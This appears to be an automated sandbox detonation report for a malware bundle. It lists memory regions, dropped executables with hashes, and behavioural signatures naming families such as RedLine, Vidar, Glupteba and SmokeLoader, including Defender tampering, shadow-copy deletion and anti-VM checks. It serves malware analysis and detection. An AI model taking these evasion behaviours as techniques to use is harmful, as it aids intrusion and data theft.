memory/2800-237-0x0000000005710000-0x0000000005711000-memory.dmp
memory/3860-240-0x000000001C0B0000-0x000000001C0B1000-memory.dmp
memory/2800-239-0x0000000005630000-0x0000000005631000-memory.dmp
memory/3048-241-0x0000000005A50000-0x0000000005A51000-memory.dmp
memory/3048-246-0x0000000005A70000-0x0000000005A71000-memory.dmp
memory/3048-243-0x0000000005A60000-0x0000000005A61000-memory.dmp
memory/3860-244-0x0000000002160000-0x0000000002161000-memory.dmp
memory/592-247-0x0000000005850000-0x0000000005851000-memory.dmp
memory/5036-253-0x0000000006E50000-0x0000000006E9E000-memory.dmp
memory/2800-251-0x0000000005700000-0x0000000005701000-memory.dmp
memory/592-257-0x0000000005730000-0x0000000005731000-memory.dmp
C:\Users\Admin\AppData\Roaming\7312180.exe
| MD5 | 7aa6d9bfdbdfa9e112e7e0f46cc845f0 |
| SHA1 | ab7a147ea36cc3766eebbe382e8caabba013f6ab |
| SHA256 | b7d035c385cc2ccdb11d4e1784908abb791e04672fe5f72e8523300c3db1426b |
| SHA512 | 966746437dc07172b13c3928d356d638726492377d33b9d39bca8addcae2ec464d363a23de5e1c17a40f35689d88b5b28884a3f378861b5dcaf0a214a22a23ce |
memory/4428-263-0x0000000003F70000-0x0000000003F7A000-memory.dmp
memory/5052-267-0x0000000000000000-mapping.dmp
memory/2800-262-0x0000000005880000-0x0000000005881000-memory.dmp
memory/3252-266-0x0000000000760000-0x0000000000761000-memory.dmp
memory/2856-265-0x0000000000400000-0x0000000000420000-memory.dmp
C:\Users\Admin\AppData\Roaming\7312180.exe
| MD5 | 7aa6d9bfdbdfa9e112e7e0f46cc845f0 |
| SHA1 | ab7a147ea36cc3766eebbe382e8caabba013f6ab |
| SHA256 | b7d035c385cc2ccdb11d4e1784908abb791e04672fe5f72e8523300c3db1426b |
| SHA512 | 966746437dc07172b13c3928d356d638726492377d33b9d39bca8addcae2ec464d363a23de5e1c17a40f35689d88b5b28884a3f378861b5dcaf0a214a22a23ce |
memory/2856-261-0x0000000000000000-mapping.dmp
memory/5036-256-0x0000000006F40000-0x0000000006F41000-memory.dmp
memory/2956-255-0x00000000025D0000-0x00000000025E9000-memory.dmp
memory/3252-252-0x0000000000000000-mapping.dmp
memory/3048-249-0x0000000005A80000-0x0000000005A81000-memory.dmp
memory/3860-248-0x00000000021C0000-0x00000000021C1000-memory.dmp
C:\Users\Admin\AppData\Roaming\4529314.exe
| MD5 | 3598180fddc06dbd304b76627143b01d |
| SHA1 | 1d39b0dd8425359ed94e606cb04f9c5e49ed1899 |
| SHA256 | 44a280749c51af08ff5c1aebcda01c36935f7ecb66d15f57e53c022ce0426bda |
| SHA512 | 8f77e49e2868dc9655dd5af20645799fb42940ca50f9dd0371bba9128286348ab3cbf09467f21b60d2596a0af6c755a43b92a26037b8dfae2e957602ff46ec9d |
C:\Users\Admin\AppData\Roaming\4529314.exe
| MD5 | 3598180fddc06dbd304b76627143b01d |
| SHA1 | 1d39b0dd8425359ed94e606cb04f9c5e49ed1899 |
| SHA256 | 44a280749c51af08ff5c1aebcda01c36935f7ecb66d15f57e53c022ce0426bda |
| SHA512 | 8f77e49e2868dc9655dd5af20645799fb42940ca50f9dd0371bba9128286348ab3cbf09467f21b60d2596a0af6c755a43b92a26037b8dfae2e957602ff46ec9d |
memory/3860-279-0x000000001DAD0000-0x000000001DAD1000-memory.dmp
memory/4288-276-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\_7LCE8eXNKPVMTjbVBUp34Tw.exe.log
| MD5 | e07da89fc7e325db9d25e845e27027a8 |
| SHA1 | 4b6a03bcdb46f325984cbbb6302ff79f33637e19 |
| SHA256 | 94ab73c00494d10a2159175b81e23047621451e3a566e5a0b1222379db634aaf |
| SHA512 | 1e33e34595ebb6ce129d0244199d29722c916c036da542c3001f84b10a964b96cec7a9fdd19e120d7840614b307b504be993a4f8538d54382aa4944575476dda |
C:\Users\Admin\Documents\_7LCE8eXNKPVMTjbVBUp34Tw.exe
| MD5 | 41c97e6248c6939d50df1c99ab04679d |
| SHA1 | 0af10b82aa8619e285627de8e7af52b772e8ed18 |
| SHA256 | b511da29b61e72108cc597ad72ecb1f920d22d9bfc0bb5ff4e3d33d9da7995ea |
| SHA512 | 04ef83f1402c630cb57a4793f74bbf78ae06bb7f9f78fe071a4303a3949feec7cb2ef1698981116ec13020e6e25ecaf92cedfe1a55838a578a46fb0de3a50677 |
memory/4508-270-0x0000000000000000-mapping.dmp
memory/3048-271-0x0000000005A90000-0x0000000005A91000-memory.dmp
memory/4432-269-0x0000000000000000-mapping.dmp
memory/3932-268-0x0000000000000000-mapping.dmp
memory/3860-298-0x000000001E9D0000-0x000000001E9D1000-memory.dmp
memory/4288-297-0x0000000000400000-0x0000000000409000-memory.dmp
memory/1156-295-0x0000000000000000-mapping.dmp
memory/3048-294-0x0000000005AA0000-0x0000000005AA1000-memory.dmp
memory/5064-288-0x0000000000000000-mapping.dmp
memory/3664-289-0x0000000000000000-mapping.dmp
memory/4112-290-0x0000000000000000-mapping.dmp
C:\Users\Admin\Documents\PMUOXlkoMDg8DAIz4tJrckfK.exe
| MD5 | 94c78c311f499024a9f97cfdbb073623 |
| SHA1 | 50e91d3eaa06d2183bf8c6c411947304421c5626 |
| SHA256 | 6aef62b3b8890bc22dd99f9b0d48247ae52c69e7ad9e384332658e73c725e40e |
| SHA512 | 29b61f1924f19d073460332950c2316acf769aa40ad7f62a41941160cd8a8da5958e8f96183e0e498afe8558fc3efb3a23f66c7519c142c780c91279ddecb545 |
C:\Users\Admin\Documents\PMUOXlkoMDg8DAIz4tJrckfK.exe
| MD5 | 94c78c311f499024a9f97cfdbb073623 |
| SHA1 | 50e91d3eaa06d2183bf8c6c411947304421c5626 |
| SHA256 | 6aef62b3b8890bc22dd99f9b0d48247ae52c69e7ad9e384332658e73c725e40e |
| SHA512 | 29b61f1924f19d073460332950c2316acf769aa40ad7f62a41941160cd8a8da5958e8f96183e0e498afe8558fc3efb3a23f66c7519c142c780c91279ddecb545 |
memory/1488-293-0x0000000000000000-mapping.dmp
C:\Users\Admin\Documents\5NzdQgNoL2Hd8YFQhpV3RI2V.exe
| MD5 | ec5c1f5a598d85d60d987827a31746a1 |
| SHA1 | 56cd531452c3e3a5baecb0abe4b032997155aaec |
| SHA256 | ab59e845bc16961db7c3f2f8249083cff0098b263dc37b7d2819b223153d2ebe |
| SHA512 | 3705d1e5777a4d9b36b2f8f382277e301c5796e1f940c5e2387bc17b671e1511cd1bebc41e834265f491c13226338cb9415b45c33f347b4d4752e4ce20b72a13 |
C:\Users\Admin\Documents\G7QyhA8sJ7kHeEyy4wYfFRug.exe
| MD5 | be5ac1debc50077d6c314867ea3129af |
| SHA1 | 2de0add69b7742fe3e844f940464a9f965b6e68f |
| SHA256 | 577643f523646cd00dedf577aeb5848405cc29518cabb4dec9ca6bcb316f9abd |
| SHA512 | 7ff22965ddce1830fbf9b05bcf19da894378f73d423c591d45397d952729ee1d0d816fd2e87e91269f6969849ecb94ab8b86f3933fd723a9e2cdea024958c324 |
C:\Users\Admin\Documents\eKqSKHZZ2JFiGVSyFjfDNb1j.exe
| MD5 | 7627ef162e039104d830924c3dbdab77 |
| SHA1 | e81996dc45106b349cb8c31eafbc2d353dc2f68b |
| SHA256 | 37896fe3568822c25970f8b4045e1504b21d7ddc54ccc9bbe85bf7f426f9b8a5 |
| SHA512 | 60501cac5e0b18c7d86624ef82f65696898dad5295f8bf28cd0e18a33e1c35d7efedf0ac7940e59b25367078dc85f7d8510ce765ce170da2613231485b923ae1 |
C:\Users\Admin\Documents\eKqSKHZZ2JFiGVSyFjfDNb1j.exe
| MD5 | 7627ef162e039104d830924c3dbdab77 |
| SHA1 | e81996dc45106b349cb8c31eafbc2d353dc2f68b |
| SHA256 | 37896fe3568822c25970f8b4045e1504b21d7ddc54ccc9bbe85bf7f426f9b8a5 |
| SHA512 | 60501cac5e0b18c7d86624ef82f65696898dad5295f8bf28cd0e18a33e1c35d7efedf0ac7940e59b25367078dc85f7d8510ce765ce170da2613231485b923ae1 |
memory/3900-283-0x0000000000000000-mapping.dmp
memory/1420-281-0x0000000000000000-mapping.dmp
memory/3600-282-0x0000000000000000-mapping.dmp
memory/3808-280-0x0000000000000000-mapping.dmp
C:\Users\Admin\Documents\VmatnQDkGajHqVCN5qoRwFKw.exe
| MD5 | 30b15129d952fc93ad162ba53d38a6c7 |
| SHA1 | c8bf919dc1d1199778b4b5d456ac45f7e129576b |
| SHA256 | 0440a1f3e16842a1ca557f3f1bb4b3e27c48d0d107af2cee00b04a21af296d89 |
| SHA512 | 2c85d6f309c72f1a47ee2a0551b41783126c4176c4971466ede0292796da3b74302254a92f820651ca334df94da5a72f32e6d949a7cf23fc6e5eb7c078b5a7e9 |
memory/2748-315-0x0000000000000000-mapping.dmp
C:\Users\Admin\Documents\X4uQJh2aEqCvnclCc_PZbhYa.exe
| MD5 | ff2d2b1250ae2706f6550893e12a25f8 |
| SHA1 | 5819d925377d38d921f6952add575a6ca19f213b |
| SHA256 | ca46080e121408d9624322e505dc2178ba99e15871c90e101b54e42ea7b54a96 |
| SHA512 | c66544678f3dd49aa1a23cd459a556d923ba44c5d88334a165ea7bd16e4561955536546627b7e83bf1e759428c04b6312e08fdc8c2f6fab69cd29f3b62ce3d23 |
memory/3600-320-0x00000000007B0000-0x00000000007C0000-memory.dmp
memory/3600-328-0x00000000007D0000-0x00000000007E2000-memory.dmp
memory/3048-332-0x0000000005AB0000-0x0000000005AB1000-memory.dmp
C:\Users\Admin\Documents\E6TRgkpLt1N0zENcY_UZeYQx.exe
| MD5 | 6eab2a9353bf7254d1d583489d8317e2 |
| SHA1 | 553754576adb15c7a2a4d270b2a2689732002165 |
| SHA256 | 4aefb36ac35b1cc94895ea4459cc8e51e88a9fa8e957b94617d66a2c841e182b |
| SHA512 | 9c5a4f15794418adcce63246fdba9209fe6a9df25d5044e93de8f80e68e92e246db82bb66c3ac5f4815c81570df9588caa63b8d4099e07e9da840754f71ca569 |
C:\Users\Admin\Documents\9dY8lwHbaM85prcqOGGjFq3O.exe
| MD5 | e4deef56f8949378a1c650126cc4368b |
| SHA1 | cc62381e09d237d1bee1f956d7a051e1cc23dc1f |
| SHA256 | fd9d10b2598d0e12b25bf26410a0396667901fb8150085650b8415d58ccdb8ac |
| SHA512 | d84bbb39c05503ba428600ced4342ed77db6437ea142af33e34374691f055020b845152382d0516cf105e3379d6d20fa1c204c2799773f3a559bdbc38e0a9ffd |
C:\Users\Admin\Documents\9dY8lwHbaM85prcqOGGjFq3O.exe
| MD5 | e4deef56f8949378a1c650126cc4368b |
| SHA1 | cc62381e09d237d1bee1f956d7a051e1cc23dc1f |
| SHA256 | fd9d10b2598d0e12b25bf26410a0396667901fb8150085650b8415d58ccdb8ac |
| SHA512 | d84bbb39c05503ba428600ced4342ed77db6437ea142af33e34374691f055020b845152382d0516cf105e3379d6d20fa1c204c2799773f3a559bdbc38e0a9ffd |
C:\Users\Admin\AppData\Roaming\4817824.exe
| MD5 | a4118db763f38f44c6869f3d46442aa0 |
| SHA1 | 6842ee38f9fc7fc7d0aa7b3eaff33e9d2de507b3 |
| SHA256 | daa06f4f0bc4c42eba48a486cc1497d31c594704b23f36855c71a3ba4dd0c49e |
| SHA512 | 577a92cb503a8de18b18c296b8617f7bcce9bf032a480cda529b2a0b0247cb5fcc165d54bd7cab9eeb5c4a3e7a64f172ccb39b1d0b9d12e1cc2f9e353eb1086f |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\5NzdQgNoL2Hd8YFQhpV3RI2V.exe.log
| MD5 | e07da89fc7e325db9d25e845e27027a8 |
| SHA1 | 4b6a03bcdb46f325984cbbb6302ff79f33637e19 |
| SHA256 | 94ab73c00494d10a2159175b81e23047621451e3a566e5a0b1222379db634aaf |
| SHA512 | 1e33e34595ebb6ce129d0244199d29722c916c036da542c3001f84b10a964b96cec7a9fdd19e120d7840614b307b504be993a4f8538d54382aa4944575476dda |
C:\Users\Admin\Documents\5NzdQgNoL2Hd8YFQhpV3RI2V.exe
| MD5 | ec5c1f5a598d85d60d987827a31746a1 |
| SHA1 | 56cd531452c3e3a5baecb0abe4b032997155aaec |
| SHA256 | ab59e845bc16961db7c3f2f8249083cff0098b263dc37b7d2819b223153d2ebe |
| SHA512 | 3705d1e5777a4d9b36b2f8f382277e301c5796e1f940c5e2387bc17b671e1511cd1bebc41e834265f491c13226338cb9415b45c33f347b4d4752e4ce20b72a13 |
memory/1464-313-0x0000000000000000-mapping.dmp
memory/3244-314-0x0000000000000000-mapping.dmp
C:\Users\Admin\Documents\E6TRgkpLt1N0zENcY_UZeYQx.exe
| MD5 | 6eab2a9353bf7254d1d583489d8317e2 |
| SHA1 | 553754576adb15c7a2a4d270b2a2689732002165 |
| SHA256 | 4aefb36ac35b1cc94895ea4459cc8e51e88a9fa8e957b94617d66a2c841e182b |
| SHA512 | 9c5a4f15794418adcce63246fdba9209fe6a9df25d5044e93de8f80e68e92e246db82bb66c3ac5f4815c81570df9588caa63b8d4099e07e9da840754f71ca569 |
memory/3100-337-0x0000000001440000-0x0000000001456000-memory.dmp
memory/1572-340-0x0000000000000000-mapping.dmp
memory/2568-311-0x0000000003FA0000-0x0000000003FCF000-memory.dmp
C:\Users\Admin\Documents\fCzC67EUFmJ5B97GO7XkTwsJ.exe
| MD5 | 44c355ae8cc3ecc4a95b5716fb9635fd |
| SHA1 | f4d46438cad6fac2be4fb08cf6972a8306e5e12a |
| SHA256 | f77f16151eb30569f7f1276063f67100c6ad439fde9d07605c5ae5e0c9eb8b7d |
| SHA512 | 46ab10861ff330796bd7e60c71e474ebb7a44d2000eea9d56c4fcc27d6b1e1c643996c91d6261f107aa5b86b3bbaf38c23be4705a6fcc3a587bd9d7422c7f259 |
C:\Users\Admin\Documents\r3sUVpG8YzDn117UsLb5R5OU.exe
| MD5 | c7ccbd62c259a382501ff67408594011 |
| SHA1 | c1dca912e6c63e3730f261a3b4ba86dec0acd5f3 |
| SHA256 | 8cfa7e9bc6cbd458cec18a25e6f763a3776802490e6b3d451d864c4dba50c437 |
| SHA512 | 5f5958363820795f96fff6ad71bc1b59ec01a6a24876c5d22d48efaa49bc55373fca1f8e927c23547cdb494ba46b6d3871f377e607c97d9f10d4e0636ac7ef2b |
C:\Users\Admin\Documents\5tUBHcAl1axgrDZU8jXaJml_.exe
| MD5 | a18f404bd61a4168a4693b1a76ffa81f |
| SHA1 | 021faa4316071e2db309658d2607779e911d1be7 |
| SHA256 | 403b1b1f0aca4695f9826afccbff72c3463f47fe9dd72daf74250dab62f52d0e |
| SHA512 | 47f58cd69e3cb7042b94ef0205fda6d8aa0f3e7d8358f09c7b1797f6c17c38dc839d01bb6ee7bedaeb4d1953da955433a6dbdcaffbc85f0c5a23509865ee2d4b |
memory/1488-307-0x0000000000400000-0x0000000000420000-memory.dmp
C:\Users\Admin\Documents\lcuipBJpFrvOQm_Mceqsl0ox.exe
| MD5 | a6ef5e293c9422d9a4838178aea19c50 |
| SHA1 | 93b6d38cc9376fa8710d2df61ae591e449e71b85 |
| SHA256 | 94ae283f87d31de4b9ae3344c469239be735621cd7546e95dfa70afa028507a0 |
| SHA512 | b5a999ca504efb49bcb209dcc1791dd77eded67f798590deb25a545009c2ad7577c8edc376b0f6c26140f82ecb5196b0a821be0cede6cdf65938ee174bfd4454 |
memory/1856-342-0x0000000000000000-mapping.dmp
memory/3048-348-0x0000000005AC0000-0x0000000005AC1000-memory.dmp
memory/2856-351-0x0000000005EB0000-0x00000000064C8000-memory.dmp
memory/3048-354-0x0000000005AD0000-0x0000000005AD1000-memory.dmp
memory/3252-345-0x000000001B580000-0x000000001B582000-memory.dmp
memory/3120-341-0x00000000040F0000-0x0000000004120000-memory.dmp
C:\Users\Admin\Documents\lcuipBJpFrvOQm_Mceqsl0ox.exe
| MD5 | a6ef5e293c9422d9a4838178aea19c50 |
| SHA1 | 93b6d38cc9376fa8710d2df61ae591e449e71b85 |
| SHA256 | 94ae283f87d31de4b9ae3344c469239be735621cd7546e95dfa70afa028507a0 |
| SHA512 | b5a999ca504efb49bcb209dcc1791dd77eded67f798590deb25a545009c2ad7577c8edc376b0f6c26140f82ecb5196b0a821be0cede6cdf65938ee174bfd4454 |
C:\Users\Admin\Documents\MqvI8Cq4rKJpl1rZaYA3UHxb.exe
| MD5 | a84a527c4444287e412b4ab44bc63c9c |
| SHA1 | f1319320c69c6bfc4e7e6d82783b0bd6da19d053 |
| SHA256 | 5f482c3724bfbe5e7b934e2e48dcc2026ab35667d960a1c9ba3779165f594916 |
| SHA512 | a87ee15748adb35c49796a7a7e717aafecccfd1f3916f3f15cd350efc4945daee6930d53f5e072e05d169d302fa1c9bde5d4cb61289bfb56f09e9512efe2bbf4 |
C:\Users\Admin\Documents\MqvI8Cq4rKJpl1rZaYA3UHxb.exe
| MD5 | a84a527c4444287e412b4ab44bc63c9c |
| SHA1 | f1319320c69c6bfc4e7e6d82783b0bd6da19d053 |
| SHA256 | 5f482c3724bfbe5e7b934e2e48dcc2026ab35667d960a1c9ba3779165f594916 |
| SHA512 | a87ee15748adb35c49796a7a7e717aafecccfd1f3916f3f15cd350efc4945daee6930d53f5e072e05d169d302fa1c9bde5d4cb61289bfb56f09e9512efe2bbf4 |
C:\Users\Admin\Documents\QLXqt3I4VSrifZucS_spgEli.exe
| MD5 | 9ed5ce96f8dd0103ee18db80d620a423 |
| SHA1 | c62a5d535ceea5a4f32dbfa2927e30ea7b9b321e |
| SHA256 | 762bea7e4e36328b47d28130ab8f39b6140bc1b8a27a9653d5c01e925fbc8c5c |
| SHA512 | b3f6b8c8598bc6a05a1e6e794fde6db2882fe7c4f0443b17ce2ff9ee0c52a76fb9d04dbe25c59374acc06288f581896052edccb21407c7a0a11df15d1d1fbc97 |
C:\Users\Admin\Documents\QLXqt3I4VSrifZucS_spgEli.exe
| MD5 | 9ed5ce96f8dd0103ee18db80d620a423 |
| SHA1 | c62a5d535ceea5a4f32dbfa2927e30ea7b9b321e |
| SHA256 | 762bea7e4e36328b47d28130ab8f39b6140bc1b8a27a9653d5c01e925fbc8c5c |
| SHA512 | b3f6b8c8598bc6a05a1e6e794fde6db2882fe7c4f0443b17ce2ff9ee0c52a76fb9d04dbe25c59374acc06288f581896052edccb21407c7a0a11df15d1d1fbc97 |
C:\Users\Admin\Documents\tNuGeSEEQylXg1KTa9XqWCIK.exe
| MD5 | 7c34cf01cf220a4caf2feaee9a187b77 |
| SHA1 | 700230ccddb77c860b718aee7765d25847c52cbf |
| SHA256 | bbfe7a85b5e34c8b000529b0bac402a6d225ffd0eb2ffdad120326a34e4b7608 |
| SHA512 | b2c24c363ce8bdda92c4def2afa57995cf0ed7b0feda1082a979f14edc73b87ce171adcf337dd85a9b5b5daaa90471a65a3f7506a02da3af92e2e7b56451baa3 |
C:\Users\Admin\Documents\tNuGeSEEQylXg1KTa9XqWCIK.exe
| MD5 | 7c34cf01cf220a4caf2feaee9a187b77 |
| SHA1 | 700230ccddb77c860b718aee7765d25847c52cbf |
| SHA256 | bbfe7a85b5e34c8b000529b0bac402a6d225ffd0eb2ffdad120326a34e4b7608 |
| SHA512 | b2c24c363ce8bdda92c4def2afa57995cf0ed7b0feda1082a979f14edc73b87ce171adcf337dd85a9b5b5daaa90471a65a3f7506a02da3af92e2e7b56451baa3 |
memory/3048-364-0x0000000005AE0000-0x0000000005AE1000-memory.dmp
memory/1488-359-0x0000000005230000-0x0000000005848000-memory.dmp
memory/3048-369-0x0000000005AF0000-0x0000000005AF1000-memory.dmp
memory/5064-371-0x0000000003000000-0x000000000302F000-memory.dmp
memory/3048-376-0x0000000005B10000-0x0000000005B11000-memory.dmp
memory/1260-374-0x0000000000000000-mapping.dmp
memory/3048-370-0x0000000005B00000-0x0000000005B01000-memory.dmp
memory/3048-381-0x0000000005B20000-0x0000000005B21000-memory.dmp
memory/4112-385-0x00000000050C0000-0x00000000050C1000-memory.dmp
memory/5160-383-0x0000000000000000-mapping.dmp
memory/1636-379-0x0000000000000000-mapping.dmp
memory/4380-377-0x0000000004310000-0x0000000004415000-memory.dmp
memory/5292-387-0x0000000000000000-mapping.dmp
memory/3048-389-0x0000000005B30000-0x0000000005B31000-memory.dmp
memory/1636-388-0x00000000006E0000-0x00000000006E3000-memory.dmp
memory/3048-391-0x0000000005B40000-0x0000000005B41000-memory.dmp
memory/3048-394-0x0000000005B50000-0x0000000005B51000-memory.dmp
memory/3048-396-0x0000000005B60000-0x0000000005B61000-memory.dmp
memory/5460-401-0x0000000000000000-mapping.dmp
memory/3860-404-0x0000000000942000-0x0000000000944000-memory.dmp
memory/1572-406-0x0000000005860000-0x0000000005E78000-memory.dmp
memory/5676-409-0x0000000000000000-mapping.dmp
memory/3244-425-0x0000000002470000-0x000000000249F000-memory.dmp
memory/3860-420-0x0000000000944000-0x0000000000945000-memory.dmp
memory/4508-435-0x00000000040A0000-0x00000000040D0000-memory.dmp
memory/3900-438-0x0000000004160000-0x00000000041FD000-memory.dmp
memory/1420-431-0x0000000002580000-0x0000000002589000-memory.dmp
memory/1856-444-0x0000000004F10000-0x0000000004F11000-memory.dmp
memory/5564-443-0x0000000000000000-mapping.dmp
memory/6000-442-0x0000000000000000-mapping.dmp
memory/5152-449-0x0000000000000000-mapping.dmp
memory/4152-463-0x0000000000000000-mapping.dmp
memory/1464-451-0x00000000052A0000-0x00000000052A1000-memory.dmp
memory/904-460-0x0000000000000000-mapping.dmp
memory/4908-468-0x0000000000000000-mapping.dmp
memory/2140-476-0x0000000000000000-mapping.dmp
memory/5456-475-0x0000000000000000-mapping.dmp
memory/3932-491-0x00000000054D0000-0x00000000054D1000-memory.dmp
memory/3664-486-0x0000000003160000-0x0000000003161000-memory.dmp
memory/5624-489-0x0000000000000000-mapping.dmp
memory/904-481-0x0000000000400000-0x0000000000414000-memory.dmp
memory/5564-497-0x00000000055F0000-0x0000000005C08000-memory.dmp
memory/5668-496-0x0000000000000000-mapping.dmp
memory/5292-509-0x000001AA59990000-0x000001AA59A5F000-memory.dmp
memory/428-507-0x0000000000000000-mapping.dmp
memory/5204-506-0x0000000000000000-mapping.dmp
memory/2424-504-0x0000000000000000-mapping.dmp
memory/5668-505-0x0000000000400000-0x0000000000414000-memory.dmp
memory/5292-500-0x000001AA59920000-0x000001AA5998F000-memory.dmp
memory/5640-494-0x0000000000000000-mapping.dmp
memory/5640-513-0x00000000021B0000-0x00000000021B1000-memory.dmp
memory/2140-510-0x0000000000400000-0x0000000000414000-memory.dmp
memory/2436-514-0x0000000000000000-mapping.dmp
memory/2424-516-0x0000000000700000-0x0000000000701000-memory.dmp
memory/5640-520-0x0000000005A60000-0x0000000005A61000-memory.dmp
memory/5640-518-0x0000000005A50000-0x0000000005A51000-memory.dmp
memory/5432-517-0x0000000000000000-mapping.dmp
memory/5432-523-0x0000000000400000-0x000000000046D000-memory.dmp
memory/1148-527-0x0000000000000000-mapping.dmp
memory/3460-533-0x0000000000000000-mapping.dmp
memory/1240-526-0x0000000000000000-mapping.dmp
memory/5704-530-0x0000000000000000-mapping.dmp
memory/3140-537-0x0000000000000000-mapping.dmp
memory/2296-532-0x0000000000000000-mapping.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2021-08-22 20:10
Reported
2021-08-22 20:41
Platform
win11
Max time kernel
435s
Max time network
1770s
Command Line
Signatures
Buran
Glupteba
Glupteba Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
MetaSploit
Modifies Windows Defender Real-time Protection settings
NetSupport
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\rundll32.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\rundll32.exe |
RedLine
RedLine Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
SmokeLoader
Socelars
Suspicious use of NtCreateProcessExOtherParentProcess
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 10248 created 10116 | N/A | C:\Windows\system32\svchost.exe | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com |
| PID 10248 created 10116 | N/A | C:\Windows\system32\svchost.exe | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com |
Turns off Windows Defender SpyNet reporting
Vidar
Windows security bypass
Checks for common network interception software
Deletes shadow copies
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\is-GRJB0.tmp\3377047_logo_media.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\SETC20F.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\System32\drivers\SETC20F.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\tap0901.sys | C:\Windows\system32\DrvInst.exe | N/A |
Executes dropped EXE
Stops running service(s)
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\s27w7dhtXK2yj0R0i9jmP7AH.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\83C5.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\UkdBd92nKdEVxt7NH_xJ86WB.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\J6vAkH5kawOVLHYY8QC6PvMX.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\s27w7dhtXK2yj0R0i9jmP7AH.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\dKoMKenWr0odB6tjTFVUEYzN.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\83C5.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\PpQsW20a0P92HEBP_c6swrBX.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\686.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\tdQsgapgd7CCgb2Nac7hGQFU.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\I7r1FrUEwNmYSO5O6BudkuEm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\I7r1FrUEwNmYSO5O6BudkuEm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\dKoMKenWr0odB6tjTFVUEYzN.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\B826.exe | N/A |
